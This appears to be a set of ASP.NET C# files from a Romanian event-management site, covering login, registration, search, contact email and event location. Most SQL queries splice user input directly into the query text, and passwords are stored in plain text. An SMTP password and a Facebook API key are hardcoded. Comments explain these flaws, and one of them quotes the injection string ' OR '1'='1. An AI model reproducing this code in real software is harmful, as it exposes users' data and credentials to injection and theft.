// cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
// cmd.CommandType = CommandType.Text;
// if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
// {
// cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
// cmd.CommandType = CommandType.Text;
// using (SqlDataReader SRD = cmd.ExecuteReader())
// {
// SRD.Read();
// {
// //MesajRaspuns.Text = "2";
// textbox_latitudine.Text = (SRD.GetDouble(0).ToString());
// textbox_longitudine.Text = (SRD.GetDouble(1).ToString());
// //MesajRaspuns.Text += "3";
// Session["locatie"] = "da";
// }
// }
// }
// else
// Session["locatie"] = "nu";
// }
// catch (Exception ex)
// {
// MesajRaspuns.Text = "eroareeeeeeeeeeeee in ButtonEditeazaLocatie_Click " + ex.Message;
// }
// sqlConnection1.Close();
// // MesajRaspuns.Text = Session["locatie"].ToString();
//}
protected void editareLocatie() // called from Page_Load when the current user owns the event
{
SqlCommand cmd = new SqlCommand();
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select count(*) from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
{
cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
cmd.CommandType = CommandType.Text;
using (SqlDataReader SRD = cmd.ExecuteReader())
{
SRD.Read();
{
//MesajRaspuns.Text = "2";
textbox_latitudine.Text = (SRD.GetDouble(0).ToString());
textbox_longitudine.Text = (SRD.GetDouble(1).ToString());
MesajRaspuns.Text += "3";
Session["locatie"] = "da";
}
}
}
else
Session["locatie"] = "nu";
}
catch (Exception ex)
{
MesajRaspuns.Text = "eroareeeeeeeeeeeee in editareLocatie " + ex.Message;
}
sqlConnection1.Close();
}
protected void ButtonSubmitLocatie_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
double lat = 90.0, longi = -90.0;
if (Double.TryParse(textbox_latitudine.Text, out lat) == false)
{
MesajRaspuns.Text = "introduceti o latitudine numerica intre -90 si 90";
return;
}
else if (lat > 90 || lat < -90)
{
MesajRaspuns.Text = "introduceti o latitudine numerica intre -90 si 90";
return;
}
if (Double.TryParse(textbox_longitudine.Text, out longi) == false)
{
MesajRaspuns.Text = "introduceti o longitudine numerica intre -180 si 180";
return;
}
else if (longi > 180 || longi < -180) // longitude spans -180..180, unlike latitude
{
MesajRaspuns.Text = "introduceti o longitudine numerica intre -180 si 180";
return;
}
try
{
sqlConnection1.Open();
cmd.Connection = sqlConnection1;
if (Session["locatie"] == "nu")
{
MesajRaspuns.Text = Session["locatie"].ToString();
cmd.CommandText = "insert into locatie(latitudine,longitutine,id_eveniment) values(" + lat + "," + longi + "," + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ");";
cmd.CommandType = CommandType.Text;
}
else if (Session["locatie"] == "da")
{
cmd.CommandText = "update locatie set latitudine = " + lat + ", longitutine = " + longi + " where id_eveniment = " + Convert.ToInt32(Session["IdEvenimentSelectat"]) + " ;";
cmd.CommandType = CommandType.Text;
MesajRaspuns.Text += Session["locatie"].ToString();
}
cmd.ExecuteNonQuery();
MesajRaspuns.Text += Session["locatie"].ToString();
//if (Convert.ToInt32(cmd.ExecuteScalar()) != 0)
//{
// cmd.CommandText = "select latitudine,longitutine from locatie where id_eveniment=" + Convert.ToInt32(Session["IdEvenimentSelectat"]) + ";";
// cmd.CommandType = CommandType.Text;
// using (SqlDataReader SRD = cmd.ExecuteReader())
// {
// while (SRD.Read())
// {
// MesajRaspuns.Text = "2";
// lat = (SRD.GetDouble(0));
// longi = (SRD.GetDouble(1));
// MesajRaspuns.Text += "3";
// }
// }
//}
}
catch (Exception ex)
{
MesajRaspuns.Text += "eroareeeeeeeeeeeee in editeaza locatie " + ex.Message;
}
sqlConnection1.Close();
// Response.Redirect("Eveniment.aspx");
}
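// NOTE (illustrative sketch): latitude lives in [-90, 90] but longitude in [-180, 180];
// a shared helper keeps the two ranges from being swapped again in future handlers.
private static bool CoordonateValide(double lat, double longi)
{
return lat >= -90.0 && lat <= 90.0 && longi >= -180.0 && longi <= 180.0;
}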
}<file_sep>/PIP/Contact.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
//using System.Web.Mail;
using System.Net.Mail;
public partial class Contact : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
}
protected void TextBox1_TextChanged(object sender, EventArgs e)
{
}
protected void Button_sendEmail_Click(object sender, EventArgs e)
{
string fromEmail = email.Text;
string BodyEmail = mesaj.Text;
string nume = nume_sender.Text;
string subject = subiect.Text;
if ((fromEmail == "") || (BodyEmail == "") || (nume == "") || (subject == ""))
{
MesajEroare.Text = "Completati toate campurile";
return;
}
MailMessage msg = new MailMessage();
System.Net.Mail.SmtpClient client = new System.Net.Mail.SmtpClient();
try {
msg.Subject = subject;
msg.Body = BodyEmail;
msg.From = new MailAddress(fromEmail);
msg.To.Add("<EMAIL>");
msg.IsBodyHtml = true;
client.Host = "smtp.gmail.com";
System.Net.NetworkCredential basicauthenticationinfo = new System.Net.NetworkCredential("<EMAIL>", "ingineria");
client.Port = int.Parse("587");
client.EnableSsl = true;
client.UseDefaultCredentials = false;
client.Credentials = basicauthenticationinfo;
client.DeliveryMethod = SmtpDeliveryMethod.Network;
client.Send(msg);
} catch (Exception ex) {
throw new Exception("Trimiterea emailului a esuat.", ex); // keep the SMTP error as InnerException instead of discarding it
}
Response.Redirect("Contact.aspx");
//return Redirect(HttpContext.Request.UrlReferrer.AbsoluteUri);
}
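// NOTE (illustrative sketch): the handler above hardcodes the Gmail password in source.
// Reading the credentials from Web.config keeps them out of the repository; the
// appSettings keys "SmtpUser" and "SmtpPass" are assumptions, not existing config.
// Requires a reference to System.Configuration.
private static System.Net.NetworkCredential CredentialeSmtp()
{
string user = System.Configuration.ConfigurationManager.AppSettings["SmtpUser"];
string pass = System.Configuration.ConfigurationManager.AppSettings["SmtpPass"];
return new System.Net.NetworkCredential(user, pass);
}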
}<file_sep>/PIP/EvenimenteFeatured.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI.HtmlControls;
using System.IO;
using System.Data.OleDb;
public partial class EvenimenteFeatured : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
afisareEvenimenteAsemanatoare();
}
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void afisareEvenimenteAsemanatoare()
{
int id = Convert.ToInt32(Session["IdEvenimentSelectat"]);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select * from evenimente where id=" + id + ";";
cmd.CommandType = CommandType.Text;
//ButtonEvenimenteCreate.ToolTip = "1";
//ButtonSearch.ToolTip = "0";
// read the tags, the start date and the city so we can look for other events sharing them
string etichete = "%", oras = "%"; // the tags field also carries the city
DateTime data = DateTime.Now;
try
{
sqlConnection1.Open();
SqlDataReader InfoEvent = cmd.ExecuteReader();
while (InfoEvent.Read())
{
etichete = InfoEvent.GetString(InfoEvent.GetOrdinal("etichete"));
oras = InfoEvent.GetString(InfoEvent.GetOrdinal("oras"));
data = InfoEvent.GetDateTime(InfoEvent.GetOrdinal("data_inceperii"));
}
sqlConnection1.Close();
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia afisareInfoFeatured " + ex.Message;
}
try
{
cmd.CommandText = "select * from evenimente where (etichete like '" + etichete + "' or ( data_inceperii = '" + data + "' and oras= '" + oras + "') or data_inceperii = '" + data + "' or oras= '" + oras + "') and id !=" + id + " ;";
cmd.CommandType = CommandType.Text;
sqlConnection1.Open();
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
int contor = 0;
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); // a new row for this event
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("nume")));
idevenimetfeatured.Add(InfoEvenimente.GetInt32(InfoEvenimente.GetOrdinal("id")));
NewRow[1] = InfoEvenimente.GetDateTime(InfoEvenimente.GetOrdinal("data_inceperii")).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("oras"));
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
// contor++;
}
InfoEvenimente.Close();
// LabelMesajEroare.Text = " contor = " + contor + " ";
//}
GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; // walks the event ids in step with the grid rows
foreach (GridViewRow row in GridViewFeatured.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(toPaginaEvenimentAccesat);
spre.ToolTip = "ev_creat";
row.Cells[i].Controls.Add(spre);
// LabelMesajEroare.Text += spre.ID + " i = " + i + " ";
index_eveniment++;
}
// LabelMesajEroare.Text += " index eveniment "+index_eveniment + " " ;
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia afisareInfoFeatured " + ex.Message;
}
sqlConnection1.Close();
}
protected void toPaginaEvenimentAccesat(object sender, EventArgs e)
{
LinkButton x = (LinkButton)sender;
if (x.ToolTip == "ev_creat")
{
Session["IdEvenimentSelectat"] = Convert.ToInt32(x.ID.Substring(13));
//SearchBox.Text = Session["IdEvenimentSelectat"].ToString();
// okk++;
// LabelMesajEroare.Text += " in catrepag " + Session["IdEvenimentSelectat"] + " ";
Response.Redirect("Eveniment.aspx");
}
}
protected void inapoi_Click(object sender, EventArgs e)
{
Response.Redirect("Eveniment.aspx");
}
}<file_sep>/PIP/BaraDeNavigare_MasterPage.master.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Collections;
public class FaceBookUser
{
public string Id { get; set; }
public string Name { get; set; }
public string UserName { get; set; }
public string PictureUrl { get; set; }
public string Email { get; set; }
}
public partial class BaraDeNavigare_MasterPage : System.Web.UI.MasterPage
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
protected void Page_Load(object sender, EventArgs e)
{
if (Session["nume"] == null)
{
LinkButtoninregistrare.Visible = true;
LinkButtonlogin.Visible = true;
LinkButtonlogout.Visible = false;
LinkButtonprofil.Visible = false;
}
else
{
LinkButtoninregistrare.Visible = false;
LinkButtonlogin.Visible = false;
LinkButtonlogout.Visible = true;
LinkButtonprofil.Visible = true;
nume_logat.Text = "" + ((string)Session["nume"]);
}
}
protected void profil_click(object sender, EventArgs e)
{
Response.Redirect("profil.aspx");
LinkButtoninregistrare.Visible = false;
LinkButtonlogin.Visible = false;
LinkButtonlogout.Visible = true;
LinkButtonprofil.Visible = true;
}
protected void inregistrare_click(object sender, EventArgs e)
{
Panellogin.Visible = false;
Panelinreg.Visible = true;
}
protected void home_click(object sender, EventArgs e)
{
Response.Redirect("homepage.aspx");
}
protected void login_click(object sender, EventArgs e)
{
Panellogin.Visible = true;
Panelinreg.Visible = false;
}
protected void logout_click(object sender, EventArgs e)
{
Session["nume"] = null;
Session["id"] = null;
nume_logat.Text = "";
LinkButtoninregistrare.Visible = true;
LinkButtonlogin.Visible = true;
LinkButtonlogout.Visible = false;
LinkButtonprofil.Visible = false;
Response.Redirect("homepage.aspx"); // redirectionare catre home cand da logout
}
protected void Buttoncreare_Click(object sender, EventArgs e)
{
SqlCommand cmd = new SqlCommand();
int nr = 0;
Labelinregeroare.Text = "";
if ((TextBoxacont.Text == "") || (TextBoxparola.Text == "") || (TextBoxparola2.Text == ""))
{
Labelinregeroare.Text = "Va rugam sa completati toate campurile obligatorii";
return;
}
if (TextBoxparola.Text != TextBoxparola2.Text)
{
Labelinregeroare.Text = "Confirmarea parolei a esuat!";
return;
}
sqlConnection1.Open();
cmd.CommandText = "SELECT COUNT(acont) FROM utilizator where '" + TextBoxacont.Text + "'=acont";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
nr = Convert.ToInt32(cmd.ExecuteScalar());
if (nr != 0)
{
Labelinregeroare.Text = "Numele acontului este deja luat!";
return;
}
cmd.CommandText = "SELECT COUNT(acont) FROM utilizator where '" + TextBoxemail.Text + "'=email";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
nr = Convert.ToInt32(cmd.ExecuteScalar());
if (nr != 0)
{
Labelinregeroare.Text = "Emailul este deja folosit!";
return;
}
if (TextBoxnume.Text == "")
TextBoxnume.Text = " ";
if (TextBoxprenume.Text == "")
TextBoxprenume.Text = " ";
cmd = new SqlCommand("INSERT INTO utilizator(acont, nume, prenume, email, parola) VALUES('" + TextBoxacont.Text.ToString() + "','" + TextBoxnume.Text.ToString() + "','" + TextBoxprenume.Text.ToString() + "','" + TextBoxemail.Text.ToString() + "','" + TextBoxparola.Text.ToString() + "')", sqlConnection1);
cmd.ExecuteNonQuery();
sqlConnection1.Close();
Labelinregeroare.Text = "Inregistrare reusita";
Buttoncreare.Enabled = false;
}
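// NOTE (illustrative sketch): Buttoncreare_Click stores the password as plain text.
// Hashing it (here SHA-256 over a per-user salt; a slow KDF such as PBKDF2 would be
// stronger still) means a leaked table does not expose the passwords themselves.
// Names are hypothetical; uses System.Security.Cryptography and System.Text.
private static string HashParola(string parola, string salt)
{
using (var sha = System.Security.Cryptography.SHA256.Create())
{
byte[] octeti = System.Text.Encoding.UTF8.GetBytes(salt + parola);
return Convert.ToBase64String(sha.ComputeHash(octeti));
}
}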
protected void Buttonascunde_Click(object sender, EventArgs e)
{
Panelinreg.Visible = false;
}
protected void Buttonlogin_Click(object sender, EventArgs e)
{
// SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename=C:\Users\Domanitos\Downloads\creareevenimente\PIP\App_Data\PIP.mdf;Integrated Security=True");
SqlCommand cmd = new SqlCommand();
int nr = 0;
Labellogineroare.Text = "";
if (TextBoxlogina.Text == "")
{
Labellogineroare.Text = "Introduceti acont!";
return;
}
if (TextBoxloginp.Text == "")
{
Labellogineroare.Text = "Introduceti o parola!";
return;
}
sqlConnection1.Open();
cmd.CommandText = "SELECT COUNT(acont) FROM utilizator where '" + TextBoxloginp.Text + "'=parola AND '" + TextBoxlogina.Text + "'=acont;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
nr = Convert.ToInt32(cmd.ExecuteScalar());
if (nr == 0)
{
Labellogineroare.Text = "Acont sau parola gresita!";
return;
}
cmd.CommandText = "SELECT id FROM utilizator where '" + TextBoxloginp.Text + "'=parola AND '" + TextBoxlogina.Text + "'=acont;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
int id = Convert.ToInt32(cmd.ExecuteScalar());
sqlConnection1.Close();
Session["nume"] = TextBoxlogina.Text;
Session["id"] = id;
nume_logat.Text = "" + TextBoxlogina.Text;
Panellogin.Visible = false;
LinkButtoninregistrare.Visible = false;
LinkButtonlogin.Visible = false;
LinkButtonlogout.Visible = true;
LinkButtonprofil.Visible = true;
Response.Redirect("homepage.aspx");
}
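// NOTE (illustrative sketch): the login above concatenates the typed account and password
// into the SQL text, so an input like ' OR '1'='1 changes the query itself. The same
// lookup with parameters; returns 0 when no user matches. The helper name is hypothetical.
private int CautaUtilizator(string acont, string parola)
{
SqlCommand cmd = new SqlCommand(
"select id from utilizator where acont = @acont and parola = @parola",
sqlConnection1);
cmd.Parameters.AddWithValue("@acont", acont);
cmd.Parameters.AddWithValue("@parola", parola);
sqlConnection1.Open();
object rezultat = cmd.ExecuteScalar(); // null when no row matches
sqlConnection1.Close();
return rezultat == null ? 0 : Convert.ToInt32(rezultat);
}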
protected void contact_click(object sender, EventArgs e)
{
Response.Redirect("Contact.aspx");
}
}
<file_sep>/PIP/homepage.aspx.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Data;
using System.Data.SqlClient;
using System.Collections;
using System.Text.RegularExpressions;
using ASPSnippets.FaceBookAPI;
using System.Web.Script.Serialization;
public partial class homepage : System.Web.UI.Page
{
SqlConnection sqlConnection1 = new SqlConnection(@"Data Source=(LocalDB)\v11.0;AttachDbFilename='C:\Users\Domanitos\Downloads\PIPv36\PIP\App_Data\PIP.mdf';Integrated Security=True;MultipleActiveResultSets=True;Application Name=EntityFramework");
bool ok = false;
protected void Page_Load(object sender, EventArgs e)
{
if (Session["nume"] == null)
{
ButtonCreareEveniment.Visible = false;
ButtonEvenimenteCreate.Visible = false;
// ButtonEvenimenteCreateAscunde.Visible = false;
Button_EvenimenteOrganizate.Visible = false;
// Button_EvenimenteOrganizateAscunde.Visible = false;
btnLoginFacebook.Visible = true;
}
else
{
invitatiiCaOrganizator();
ButtonCreareEveniment.Visible = true;
ButtonEvenimenteCreate.Visible = true;
// ButtonEvenimenteCreateAscunde.Visible = true;
Button_EvenimenteOrganizate.Visible = true;
btnLoginFacebook.Visible = false;
}
featurednelogat(sender, e);
if (ButtonSearch.ToolTip == "1")
ButtonSearch_Click(sender, e);
if (ButtonEvenimenteCreate.ToolTip == "1")
{
ButtonCreate_Click(sender, e);
//LabelMesajEroare.Text += "DA";
}
if (Button_EvenimenteOrganizate.ToolTip == "1")
{
Button_EvenimenteOrganizate_Click(sender, e);
}
//if(GridView_listaEvenimenteOrganizate.ToolTip == "0")
//GridViewFeatured.Visible = false;
//if (GridView_listaEvenimenteOrganizate.ToolTip == "0")
//LabelMesajEroare.Text += okk;
if (Session["nume"] != null)
{
evenimente_participa();
}
FaceBookConnect.API_Key = "523932864394077";
FaceBookConnect.API_Secret = "<KEY>";
if (!IsPostBack)
{
if (Request.QueryString["error"] == "access_denied")
{
//ClientScript.RegisterStartupScript(this.GetType(), "alert", "alert('User has denied access.')", true);
return;
}
string code = Request.QueryString["code"];
if (!string.IsNullOrEmpty(code))
{
string data = FaceBookConnect.Fetch(code, "me");
FaceBookUser faceBookUser = new JavaScriptSerializer().Deserialize<FaceBookUser>(data);
faceBookUser.PictureUrl = string.Format("https://graph.facebook.com/{0}/picture", faceBookUser.Id);
//lblId.Text = faceBookUser.Id;
//Session["nume"] = faceBookUser.UserName;
//lblEmail.Text = faceBookUser.Email;
SqlCommand cmd = new SqlCommand();
cmd.CommandText = "SELECT id, acont, email, parola FROM utilizator;";
cmd.CommandType = CommandType.Text;
cmd.Connection = sqlConnection1;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd.ExecuteReader())
{
while (SRD.Read())
{
if ((faceBookUser.Email == SRD.GetString(SRD.GetOrdinal("email"))) && (faceBookUser.Id == SRD.GetString(SRD.GetOrdinal("parola"))))
{
Session["nume"] = SRD.GetString(SRD.GetOrdinal("acont"));
Session["id"] = SRD.GetInt32(SRD.GetOrdinal("id"));
ok = true;
}
}
}
sqlConnection1.Close();
if (!ok)
{
SqlCommand cmd2 = new SqlCommand();
cmd2.CommandText = "INSERT INTO utilizator(acont, email, parola, nume, prenume) VALUES('" + faceBookUser.Name + "','" + faceBookUser.Email + "','" + faceBookUser.Id + "', '', '')";
cmd2.CommandType = CommandType.Text;
cmd2.Connection = sqlConnection1;
sqlConnection1.Open();
cmd2.ExecuteNonQuery();
sqlConnection1.Close();
SqlCommand cmd3 = new SqlCommand();
cmd3.CommandText = "SELECT id, acont, email, parola FROM utilizator;";
cmd3.CommandType = CommandType.Text;
cmd3.Connection = sqlConnection1;
sqlConnection1.Open();
using (SqlDataReader SRD = cmd3.ExecuteReader())
{
while (SRD.Read())
{
if ((faceBookUser.Email == SRD.GetString(SRD.GetOrdinal("email"))) && (faceBookUser.Id == SRD.GetString(SRD.GetOrdinal("parola"))))
{
Session["nume"] = SRD.GetString(SRD.GetOrdinal("acont"));
Session["id"] = SRD.GetInt32(SRD.GetOrdinal("id"));
ok = true;
}
}
}
sqlConnection1.Close();
}
btnLoginFacebook.Visible = false;
Response.Redirect("homepage.aspx");
}
}
}
protected void LoginFacebook(object sender, EventArgs e)
{
FaceBookConnect.Authorize("user_photos,email", Request.Url.AbsoluteUri.Split('?')[0]);
}
protected void ButtonSearch_Click(object sender, EventArgs e)
{
ButtonEvenimenteCreate.ToolTip = "0";
// Button_EvenimenteOrganizate.ToolTip = "0";
ButtonSearch.ToolTip = "1";
GridView_listaEvenimenteOrganizate.ToolTip = "0";
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
// cmd.CommandText = "select * from evenimente where nume = '" + SearchBox.Text + "';";
cmd.CommandType = CommandType.Text;
cmd.CommandText = "select * from evenimente ";
if (SearchBox.Text != "")
{
String[] cuvinteSearchBox = SearchBox.Text.Split(' ');
ArrayList cuvinteCautate = new ArrayList();
foreach (String cuvant in cuvinteSearchBox)
{ // drop the empty tokens produced by consecutive spaces
if (cuvant != "")
{
cuvinteCautate.Add(cuvant);
}
}
if (cuvinteCautate.Count == 0)
{ // special case: the search box contained only spaces
return;
}
for (int pasCuvant = 0; pasCuvant < cuvinteCautate.Count; pasCuvant++)
{
if (pasCuvant == cuvinteCautate.Count - 1)
{
if (pasCuvant == 0)
cmd.CommandText += " where ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or nume = '" + SearchBox.Text + "';";
else
cmd.CommandText += " ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or nume = '"+SearchBox.Text+"';";
}
else
{
if (pasCuvant == 0)
{
cmd.CommandText += " where ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or ";
}
else
{
cmd.CommandText += " ( etichete like '%" + cuvinteCautate[pasCuvant] + "%' )" + " or ";
}
}
}
//LabelMesajEroare.Text = cmd.CommandText;
//-----------------------------------
try
{
sqlConnection1.Open();
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
int contor = 0;
//using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
//{
// while (evenimetfeatured.Read())
// {
// //contor++;
// }
// evenimetfeatured.Close();
//}
//LabelMesajEroare.Text = " contor = "+contor +" ";
//foreach (int idEvent in idevenimetfeatured)
//{
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); // a new row for this event
NewRow[0] = InfoEvenimente.GetString(1);
// NewRow[1] = InfoEvenimente.GetString(1);
numeFiecareEveniment.Add(InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("nume")));
idevenimetfeatured.Add(InfoEvenimente.GetInt32(InfoEvenimente.GetOrdinal("id")));
NewRow[1] = InfoEvenimente.GetDateTime(InfoEvenimente.GetOrdinal("data_inceperii")).ToString("dd MM yyyy");
//LabelMesajEroare.Text += " Opa ";
NewRow[2] = InfoEvenimente.GetString(InfoEvenimente.GetOrdinal("oras"));
//LabelMesajEroare.Text += " Opa ";
Table_Evenimente.Rows.Add(NewRow);
// contor++;
}
InfoEvenimente.Close();
// LabelMesajEroare.Text = " contor = " + contor + " ";
//}
GridViewFeatured.DataSource = Table_Evenimente;
GridViewFeatured.DataBind();
int index_eveniment = 0; // walks the event ids in step with the grid rows
foreach (GridViewRow row in GridViewFeatured.Rows)
{
int i = 0;
LinkButton spre = new LinkButton();
spre.ID = "LinkEveniment" + idevenimetfeatured[index_eveniment].ToString(); //fiecare buton are id-ul evenimentului pe care il refera
spre.Text = numeFiecareEveniment[index_eveniment].ToString();
spre.Click += new EventHandler(toPaginaEvenimentAccesat);
spre.ToolTip = "ev_creat";
row.Cells[i].Controls.Add(spre);
// LabelMesajEroare.Text += spre.ID + " i = " + i + " ";
index_eveniment++;
}
// LabelMesajEroare.Text += " index eveniment " + index_eveniment + " ";
}
catch (Exception ex)
{
LabelMesajEroare.Text += "Eroare in functia ButtonCreate_CLick " + ex.Message;
}
//sqlConnection1.Open();
//if (((Label)Panelsearch.FindControl("k1")) == null)
//{
// Label k = new Label();
// k.ID = "k1";
// k.Text = "<h2>Rezultatele cautarii:</h2>";
// Panelsearch.Controls.Add(k);
//}
//using (SqlDataReader SRD = cmd.ExecuteReader())
//{
// while (SRD.Read())
// {
// LinkButton btn = new LinkButton();
// btn.ID = "LinkEveniment" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// if (((LinkButton)Panelsearch.FindControl(btn.ID)) == null)
// {
// ButtonSearch.ToolTip = "1";
// btn.ID = "LinkEveniment" + SRD.GetInt32(SRD.GetOrdinal("id")).ToString();
// btn.Text = SRD.GetString(SRD.GetOrdinal("nume")).ToString();
// btn.Click += new EventHandler(butoneveniment);
// Panelsearch.Controls.Add(btn);
// //Panelsearch.Controls.Add(new LiteralControl("<br />"));
// //Label l2 = new Label();
// //l2.Text = "Nume: " + SRD.GetString(SRD.GetOrdinal("nume")).ToString();
// //Panelsearch.Controls.Add(l2);
// //Panelsearch.Controls.Add(new LiteralControl("</br>"));
// Label l3 = new Label();
// if (Convert.IsDBNull(SRD["descriere"])) l3.Text = "";
// else l3.Text = "<br />Descriere :" + SRD.GetString(SRD.GetOrdinal("descriere")).ToString();
// l3.Visible = false;
// Panelsearch.Controls.Add(l3);
// Label l4 = new Label();
// if (Convert.IsDBNull(SRD["data_inceperii"])) l4.Text = "";
// else l4.Text = "<br />"+"Data :" + SRD.GetDateTime(SRD.GetOrdinal("data_inceperii")).ToString();
// Panelsearch.Controls.Add(l4);
// Label l5 = new Label();
// l5.Text = "<br />";
// if (Convert.IsDBNull(SRD["oras"])) l5.Text += "";
// else l5.Text += " "+SRD.GetString(SRD.GetOrdinal("oras")).ToString();
// if (Convert.IsDBNull(SRD["judet"])) l5.Text += "";
// else l5.Text += " "+SRD.GetString(SRD.GetOrdinal("judet")).ToString();
// if (Convert.IsDBNull(SRD["tara"])) l5.Text += "";
// else l5.Text += " "+SRD.GetString(SRD.GetOrdinal("tara")).ToString();
// Panelsearch.Controls.Add(l5);
// Label l = new Label();
// l.Text = "<p>ID: " + SRD.GetInt32(SRD.GetOrdinal("Id")).ToString() + "</p>";
// l.Visible = false;
// Panelsearch.Controls.Add(l);
// //Panelsearch.Controls.Add(new LiteralControl("<br />"));
// Panelsearch.Controls.Add(new LiteralControl("<p></p>"));
// }
// }
//}
sqlConnection1.Close();
}
}
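// NOTE (illustrative sketch): ButtonSearch_Click builds the WHERE clause by splicing each
// search word into the SQL text. The same OR-of-LIKEs can be built with one parameter per
// word, so punctuation in the search box cannot break the statement. Assumes cuvinte is
// non-empty (the caller already guards that); the helper name is hypothetical.
private SqlCommand ConstruiesteCautare(List<string> cuvinte)
{
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
List<string> conditii = new List<string>();
for (int i = 0; i < cuvinte.Count; i++)
{
conditii.Add("etichete like @p" + i);
cmd.Parameters.AddWithValue("@p" + i, "%" + cuvinte[i] + "%");
}
cmd.CommandText = "select * from evenimente where " + string.Join(" or ", conditii.ToArray());
return cmd;
}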
protected void ButtonCreate_Click(object sender, EventArgs e)
{
GridView_listaEvenimenteOrganizate.ToolTip = "0";
int id = Convert.ToInt32(Session["id"]);
SqlCommand cmd = new SqlCommand();
cmd.Connection = sqlConnection1;
cmd.CommandText = "select * from evenimente where id_proprietar=" + id + ";";
cmd.CommandType = CommandType.Text;
ButtonEvenimenteCreate.ToolTip = "1";
ButtonSearch.ToolTip = "0";
//Button_EvenimenteOrganizate.ToolTip = "0";
try
{
sqlConnection1.Open();
DataTable Table_Evenimente = new DataTable();
if (Table_Evenimente.Columns.Count == 0)
{
Table_Evenimente.Columns.Add("Titlu", typeof(string));
Table_Evenimente.Columns.Add("Data", typeof(string));
Table_Evenimente.Columns.Add("Locatie", typeof(string));
}
List<int> idevenimetfeatured = new List<int>();
List<string> numeFiecareEveniment = new List<string>();
int contor = 0;
//using (SqlDataReader evenimetfeatured = cmd.ExecuteReader())
//{
// while (evenimetfeatured.Read())
// {
// //contor++;
// }
// evenimetfeatured.Close();
//}
//LabelMesajEroare.Text = " contor = "+contor +" ";
//foreach (int idEvent in idevenimetfeatured)
//{
SqlDataReader InfoEvenimente = cmd.ExecuteReader();
while (InfoEvenimente.Read())
{
DataRow NewRow = Table_Evenimente.NewRow(); // a new row for this event
